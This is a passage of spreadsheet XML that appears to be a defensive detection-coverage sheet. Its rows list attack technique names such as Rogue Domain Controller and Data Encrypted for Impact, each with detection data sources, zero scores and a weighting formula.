      <c r="F207" s="14">
        <v>0</v>
      </c>
      <c r="G207" s="14">
        <v>0</v>
      </c>
      <c r="H207" s="14">
        <v>0</v>
      </c>
      <c r="I207" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K207" s="46" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture</v>
      </c>
    </row>
    <row r="208" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A208" s="43" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="41" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C208" s="45"/>
      <c r="D208" s="45"/>
      <c r="E208" s="45"/>
      <c r="F208" s="14">
        <v>0</v>
      </c>
      <c r="G208" s="14">
        <v>0</v>
      </c>
      <c r="H208" s="14">
        <v>0</v>
      </c>
      <c r="I208" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K208" s="46" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
    </row>
    <row r="209" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A209" s="43" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="41" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C209" s="45"/>
      <c r="D209" s="45"/>
      <c r="E209" s="45"/>
      <c r="F209" s="14">
        <v>0</v>
      </c>
      <c r="G209" s="14">
        <v>0</v>
      </c>
      <c r="H209" s="14">
        <v>0</v>
      </c>
      <c r="I209" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K209" s="46" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
    </row>
    <row r="210" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A210" s="43" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="41" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C210" s="45"/>
      <c r="D210" s="45"/>
      <c r="E210" s="45"/>
      <c r="F210" s="14">
        <v>0</v>
      </c>
      <c r="G210" s="14">
        <v>0</v>
      </c>
      <c r="H210" s="14">
        <v>0</v>
      </c>
      <c r="I210" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K210" s="46" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
    </row>
    <row r="211" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A211" s="43" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="41" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:B)</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="C211" s="45"/>
      <c r="D211" s="45"/>
      <c r="E211" s="45"/>
      <c r="F211" s="14">
        <v>0</v>
      </c>
      <c r="G211" s="14">
        <v>0</v>
      </c>
      <c r="H211" s="14">
        <v>0</v>
      </c>
      <c r="I211" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K211" s="46" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="212" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A212" s="43" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="41" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Defense Evasion</v>
      </c>
      <c r="C212" s="45"/>
      <c r="D212" s="45"/>
      <c r="E212" s="45"/>
      <c r="F212" s="14">
        <v>0</v>
      </c>
      <c r="G212" s="14">
        <v>0</v>
      </c>
      <c r="H212" s="14">
        <v>0</v>
      </c>
      <c r="I212" s="32">
        <f t="shared" ref="I212:I245" si="5">((F212*2)+G212+(H212*2))/5</f>
        <v>0</v>
      </c>
      <c r="K212" s="46" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="213" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A213" s="43" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="41" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Credential Access</v>
      </c>
      <c r="C213" s="45"/>
      <c r="D213" s="45"/>
      <c r="E213" s="45"/>
      <c r="F213" s="14">
        <v>0</v>
      </c>
      <c r="G213" s="14">
        <v>0</v>
      </c>
      <c r="H213" s="14">
        <v>0</v>
      </c>
      <c r="I213" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K213" s="46" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
    </row>
    <row r="214" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A214" s="43" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="41" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:B)</f>
        <v>Data from Information Repositories</v>
      </c>
      <c r="C214" s="45"/>
      <c r="D214" s="45"/>
      <c r="E214" s="45"/>
      <c r="F214" s="14">
        <v>0</v>
      </c>
      <c r="G214" s="14">
        <v>0</v>
      </c>
      <c r="H214" s="14">
        <v>0</v>
      </c>
      <c r="I214" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K214" s="46" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
    </row>
    <row r="215" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A215" s="43" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="41" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C215" s="45"/>
      <c r="D215" s="45"/>
      <c r="E215" s="45"/>
      <c r="F215" s="14">
        <v>0</v>
      </c>
      <c r="G215" s="14">
        <v>0</v>
      </c>
      <c r="H215" s="14">
        <v>0</v>
      </c>
      <c r="I215" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K215" s="46" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
    </row>
    <row r="216" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A216" s="43" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="41" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C216" s="45"/>
      <c r="D216" s="45"/>
      <c r="E216" s="45"/>
      <c r="F216" s="14">
        <v>0</v>
      </c>
      <c r="G216" s="14">
        <v>0</v>
      </c>
      <c r="H216" s="14">
        <v>0</v>
      </c>
      <c r="I216" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K216" s="46" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
    </row>
    <row r="217" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A217" s="43" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="41" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:B)</f>
        <v>Signed Script Proxy Execution</v>
      </c>
      <c r="C217" s="45"/>
      <c r="D217" s="45"/>
      <c r="E217" s="45"/>
      <c r="F217" s="14">
        <v>0</v>
      </c>
      <c r="G217" s="14">
        <v>0</v>
      </c>
      <c r="H217" s="14">
        <v>0</v>
      </c>
      <c r="I217" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K217" s="46" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="218" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A218" s="43" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="41" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:B)</f>
        <v>Browser Bookmark Discovery</v>
      </c>
      <c r="C218" s="45"/>
      <c r="D218" s="45"/>
      <c r="E218" s="45"/>
      <c r="F218" s="14">
        <v>0</v>
      </c>
      <c r="G218" s="14">
        <v>0</v>
      </c>
      <c r="H218" s="14">
        <v>0</v>
      </c>
      <c r="I218" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K218" s="46" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="219" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A219" s="43" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="41" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:B)</f>
        <v>Signed Binary Proxy Execution</v>
      </c>
      <c r="C219" s="45"/>
      <c r="D219" s="45"/>
      <c r="E219" s="45"/>
      <c r="F219" s="14">
        <v>0</v>
      </c>
      <c r="G219" s="14">
        <v>0</v>
      </c>
      <c r="H219" s="14">
        <v>0</v>
      </c>
      <c r="I219" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K219" s="46" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="220" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A220" s="43" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="41" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:B)</f>
        <v>Remote Access Software</v>
      </c>
      <c r="C220" s="45"/>
      <c r="D220" s="45"/>
      <c r="E220" s="45"/>
      <c r="F220" s="14">
        <v>0</v>
      </c>
      <c r="G220" s="14">
        <v>0</v>
      </c>
      <c r="H220" s="14">
        <v>0</v>
      </c>
      <c r="I220" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K220" s="46" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="221" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A221" s="43" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="41" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:B)</f>
        <v>XSL Script Processing</v>
      </c>
      <c r="C221" s="45"/>
      <c r="D221" s="45"/>
      <c r="E221" s="45"/>
      <c r="F221" s="14">
        <v>0</v>
      </c>
      <c r="G221" s="14">
        <v>0</v>
      </c>
      <c r="H221" s="14">
        <v>0</v>
      </c>
      <c r="I221" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K221" s="46" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
    </row>
    <row r="222" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A222" s="43" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="41" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:B)</f>
        <v>Template Injection</v>
      </c>
      <c r="C222" s="45"/>
      <c r="D222" s="45"/>
      <c r="E222" s="45"/>
      <c r="F222" s="14">
        <v>0</v>
      </c>
      <c r="G222" s="14">
        <v>0</v>
      </c>
      <c r="H222" s="14">
        <v>0</v>
      </c>
      <c r="I222" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K222" s="46" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
    </row>
    <row r="223" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A223" s="43" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="41" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:B)</f>
        <v>File and Directory Permissions Modification</v>
      </c>
      <c r="C223" s="45"/>
      <c r="D223" s="45"/>
      <c r="E223" s="45"/>
      <c r="F223" s="14">
        <v>0</v>
      </c>
      <c r="G223" s="14">
        <v>0</v>
      </c>
      <c r="H223" s="14">
        <v>0</v>
      </c>
      <c r="I223" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K223" s="46" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="224" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A224" s="43" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="41" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:B)</f>
        <v>Linux and Mac File and Directory Permissions Modification</v>
      </c>
      <c r="C224" s="45"/>
      <c r="D224" s="45"/>
      <c r="E224" s="45"/>
      <c r="F224" s="14">
        <v>0</v>
      </c>
      <c r="G224" s="14">
        <v>0</v>
      </c>
      <c r="H224" s="14">
        <v>0</v>
      </c>
      <c r="I224" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K224" s="46" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="225" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A225" s="43" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="41" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:B)</f>
        <v>Execution Guardrails</v>
      </c>
      <c r="C225" s="45"/>
      <c r="D225" s="45"/>
      <c r="E225" s="45"/>
      <c r="F225" s="14">
        <v>0</v>
      </c>
      <c r="G225" s="14">
        <v>0</v>
      </c>
      <c r="H225" s="14">
        <v>0</v>
      </c>
      <c r="I225" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K225" s="46" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
    </row>
    <row r="226" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A226" s="43" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="41" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C226" s="45"/>
      <c r="D226" s="45"/>
      <c r="E226" s="45"/>
      <c r="F226" s="14">
        <v>0</v>
      </c>
      <c r="G226" s="14">
        <v>0</v>
      </c>
      <c r="H226" s="14">
        <v>0</v>
      </c>
      <c r="I226" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K226" s="46" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="227" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A227" s="43" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="41" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C227" s="45"/>
      <c r="D227" s="45"/>
      <c r="E227" s="45"/>
      <c r="F227" s="14">
        <v>0</v>
      </c>
      <c r="G227" s="14">
        <v>0</v>
      </c>
      <c r="H227" s="14">
        <v>0</v>
      </c>
      <c r="I227" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K227" s="46" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="228" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A228" s="43" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="41" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:B)</f>
        <v>Group Policy Modification</v>
      </c>
      <c r="C228" s="45"/>
      <c r="D228" s="45"/>
      <c r="E228" s="45"/>
      <c r="F228" s="14">
        <v>0</v>
      </c>
      <c r="G228" s="14">
        <v>0</v>
      </c>
      <c r="H228" s="14">
        <v>0</v>
      </c>
      <c r="I228" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K228" s="46" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
    </row>
    <row r="229" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A229" s="43" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="41" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:B)</f>
        <v>Data Destruction</v>
      </c>
      <c r="C229" s="45"/>
      <c r="D229" s="45"/>
      <c r="E229" s="45"/>
      <c r="F229" s="14">
        <v>0</v>
      </c>
      <c r="G229" s="14">
        <v>0</v>
      </c>
      <c r="H229" s="14">
        <v>0</v>
      </c>
      <c r="I229" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K229" s="46" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="230" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A230" s="43" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="41" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C230" s="45"/>
      <c r="D230" s="45"/>
      <c r="E230" s="45"/>
      <c r="F230" s="14">
        <v>0</v>
      </c>
      <c r="G230" s="14">
        <v>0</v>
      </c>
      <c r="H230" s="14">
        <v>0</v>
      </c>
      <c r="I230" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K230" s="46" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="231" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A231" s="43" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="41" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C231" s="45"/>
      <c r="D231" s="45"/>
      <c r="E231" s="45"/>
      <c r="F231" s="14">
        <v>0</v>
      </c>
      <c r="G231" s="14">
        <v>0</v>
      </c>
      <c r="H231" s="14">
        <v>0</v>
      </c>
      <c r="I231" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K231" s="46" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="232" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A232" s="43" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="41" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C232" s="45"/>
      <c r="D232" s="45"/>
      <c r="E232" s="45"/>
      <c r="F232" s="14">
        <v>0</v>
      </c>
      <c r="G232" s="14">
        <v>0</v>
      </c>
      <c r="H232" s="14">
        <v>0</v>
      </c>
      <c r="I232" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K232" s="46" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="233" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A233" s="43" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="41" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:B)</f>
        <v>Service Stop</v>
      </c>
      <c r="C233" s="45"/>
      <c r="D233" s="45"/>
      <c r="E233" s="45"/>
      <c r="F233" s="14">
        <v>0</v>
      </c>
      <c r="G233" s="14">
        <v>0</v>
      </c>
      <c r="H233" s="14">
        <v>0</v>
      </c>
      <c r="I233" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K233" s="46" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
    </row>
    <row r="234" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A234" s="43" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="41" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:B)</f>
        <v>Inhibit System Recovery</v>
      </c>
      <c r="C234" s="45"/>
      <c r="D234" s="45"/>
      <c r="E234" s="45"/>
      <c r="F234" s="14">
        <v>0</v>
      </c>
      <c r="G234" s="14">
        <v>0</v>
      </c>
      <c r="H234" s="14">
        <v>0</v>
      </c>
      <c r="I234" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K234" s="46" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="235" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A235" s="43" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="41" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:B)</f>
        <v>Defacement</v>
      </c>
      <c r="C235" s="45"/>
      <c r="D235" s="45"/>
      <c r="E235" s="45"/>
      <c r="F235" s="14">
        <v>0</v>
      </c>
      <c r="G235" s="14">
        <v>0</v>
      </c>
      <c r="H235" s="14">
        <v>0</v>
      </c>
      <c r="I235" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K235" s="46" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
    </row>
    <row r="236" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A236" s="43" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="41" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C236" s="45"/>
      <c r="D236" s="45"/>
      <c r="E236" s="45"/>
      <c r="F236" s="14">
        <v>0</v>
      </c>
      <c r="G236" s="14">
        <v>0</v>
      </c>
      <c r="H236" s="14">
        <v>0</v>
      </c>
      <c r="I236" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K236" s="46" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
    </row>
    <row r="237" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A237" s="43" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="41" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C237" s="45"/>
      <c r="D237" s="45"/>
      <c r="E237" s="45"/>
      <c r="F237" s="14">
        <v>0</v>
      </c>
      <c r="G237" s="14">
        <v>0</v>
      </c>
      <c r="H237" s="14">
        <v>0</v>
      </c>
      <c r="I237" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K237" s="46" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
    </row>
    <row r="238" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A238" s="43" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="41" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C238" s="45"/>
      <c r="D238" s="45"/>
      <c r="E238" s="45"/>
      <c r="F238" s="14">
        <v>0</v>
      </c>
      <c r="G238" s="14">
        <v>0</v>
      </c>
      <c r="H238" s="14">
        <v>0</v>
      </c>
      <c r="I238" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K238" s="46" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
    </row>
    <row r="239" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A239" s="43" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="41" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:B)</f>
        <v>Firmware Corruption</v>
      </c>
      <c r="C239" s="45"/>
      <c r="D239" s="45"/>
      <c r="E239" s="45"/>
      <c r="F239" s="14">
        <v>0</v>
      </c>
      <c r="G239" s="14">
        <v>0</v>
      </c>
      <c r="H239" s="14">
        <v>0</v>
      </c>
      <c r="I239" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K239" s="46" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
    </row>
    <row r="240" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A240" s="43" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="41" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:B)</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="C240" s="45"/>
      <c r="D240" s="45"/>
      <c r="E240" s="45"/>
      <c r="F240" s="14">
        <v>0</v>
      </c>
      <c r="G240" s="14">
        <v>0</v>
      </c>
      <c r="H240" s="14">
        <v>0</v>
      </c>
      <c r="I240" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K240" s="46" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
    </row>
    <row r="241" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A241" s="43" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="41" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:B)</f>
        <v>Virtualization/Sandbox Evasion</v>
      </c>
      <c r="C241" s="45"/>
      <c r="D241" s="45"/>
      <c r="E241" s="45"/>
      <c r="F241" s="14">
        <v>0</v>
      </c>
      <c r="G241" s="14">
        <v>0</v>
      </c>
      <c r="H241" s="14">
        <v>0</v>
      </c>
      <c r="I241" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K241" s="46" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="242" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A242" s="43" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="41" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:B)</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="C242" s="45"/>
      <c r="D242" s="45"/>
      <c r="E242" s="45"/>
      <c r="F242" s="14">
        <v>0</v>
      </c>
      <c r="G242" s="14">
        <v>0</v>
      </c>
      <c r="H242" s="14">
        <v>0</v>
      </c>
      <c r="I242" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K242" s="46" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
    </row>
    <row r="243" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A243" s="43" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="41" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:B)</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="C243" s="45"/>
      <c r="D243" s="45"/>
      <c r="E243" s="45"/>
      <c r="F243" s="14">
        <v>0</v>
      </c>
      <c r="G243" s="14">
        <v>0</v>
      </c>
      <c r="H243" s="14">
        <v>0</v>
      </c>
      <c r="I243" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K243" s="46" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
    </row>
    <row r="244" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A244" s="43" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="41" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C244" s="45"/>
      <c r="D244" s="45"/>
      <c r="E244" s="45"/>
      <c r="F244" s="14">
        <v>0</v>
      </c>
      <c r="G244" s="14">
        <v>0</v>
      </c>
      <c r="H244" s="14">
        <v>0</v>
      </c>
      <c r="I244" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K244" s="46" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="245" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A245" s="43" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="41" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C245" s="45"/>
